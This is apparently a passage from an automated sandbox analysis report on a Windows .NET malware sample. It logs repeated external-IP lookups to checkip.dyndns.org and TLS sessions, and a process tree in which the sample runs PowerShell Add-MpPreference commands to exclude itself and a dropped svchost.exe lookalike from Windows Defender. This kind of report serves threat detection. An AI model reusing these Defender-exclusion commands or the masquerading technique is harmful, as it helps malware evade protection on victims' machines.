                                                        35192.168.2.349791162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:32.597414017 CEST5156OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.702333927 CEST5156INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        36192.168.2.349792162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:32.810532093 CEST5156OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.915160894 CEST5157INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        37192.168.2.349793162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:33.327660084 CEST5157OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:33.433768988 CEST5158INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        38192.168.2.349794162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:33.553150892 CEST5158OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:33.659982920 CEST5159INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        39192.168.2.349796162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:34.491008043 CEST5165OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:34.597080946 CEST5165INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.349729162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:05.745573044 CEST4991OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:05.851958036 CEST4991INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        40192.168.2.349799162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:34.765099049 CEST5177OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:34.871043921 CEST5181INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        41192.168.2.349800162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:34.983300924 CEST5217OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.091293097 CEST5218INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        42192.168.2.349801162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:35.199928999 CEST5218OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.306433916 CEST5219INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        43192.168.2.349802162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:35.417623043 CEST5219OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.523013115 CEST5220INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        44192.168.2.349803162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:35.631524086 CEST5220OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.737811089 CEST5221INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.349730162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:08.507339954 CEST4992OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:08.612941980 CEST4992INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.349731162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:09.783368111 CEST4992OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:09.888408899 CEST4993INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.349732162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:11.054966927 CEST4993OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:11.160370111 CEST4994INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        8192.168.2.349733162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:11.827866077 CEST4995OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:11.934300900 CEST4996INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        9192.168.2.349742162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:13.074529886 CEST5021OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:13.179763079 CEST5022INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        HTTPS Packets

                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Apr 8, 2021 11:01:44.910068989 CEST104.21.56.119443192.168.2.349701CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Apr 8, 2021 11:02:55.378983021 CEST172.67.188.154443192.168.2.349725CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Apr 8, 2021 11:03:12.451477051 CEST172.67.188.154443192.168.2.349737CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Apr 8, 2021 11:03:30.037919044 CEST172.67.188.154443192.168.2.349777CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: lfQuSBwdSf.exe PID: 2788 Parent PID: 5552

                                                        General

                                                        Start time:11:01:42
                                                        Start date:08/04/2021
                                                        Path:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\lfQuSBwdSf.exe'
                                                        Imagebase:0xcb0000
                                                        File size:46080 bytes
                                                        MD5 hash:0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low

                                                        Analysis Process: svchost.exe PID: 4908 Parent PID: 568

                                                        General

                                                        Start time:11:01:50
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: powershell.exe PID: 1004 Parent PID: 2788

                                                        General

                                                        Start time:11:01:55
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 4808 Parent PID: 1004

                                                        General

                                                        Start time:11:01:56
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: powershell.exe PID: 720 Parent PID: 2788

                                                        General

                                                        Start time:11:01:56
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 4456 Parent PID: 720

                                                        General

                                                        Start time:11:01:57
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: powershell.exe PID: 1000 Parent PID: 2788

                                                        General

                                                        Start time:11:01:57
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 5988 Parent PID: 1000

                                                        General

                                                        Start time:11:01:57
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
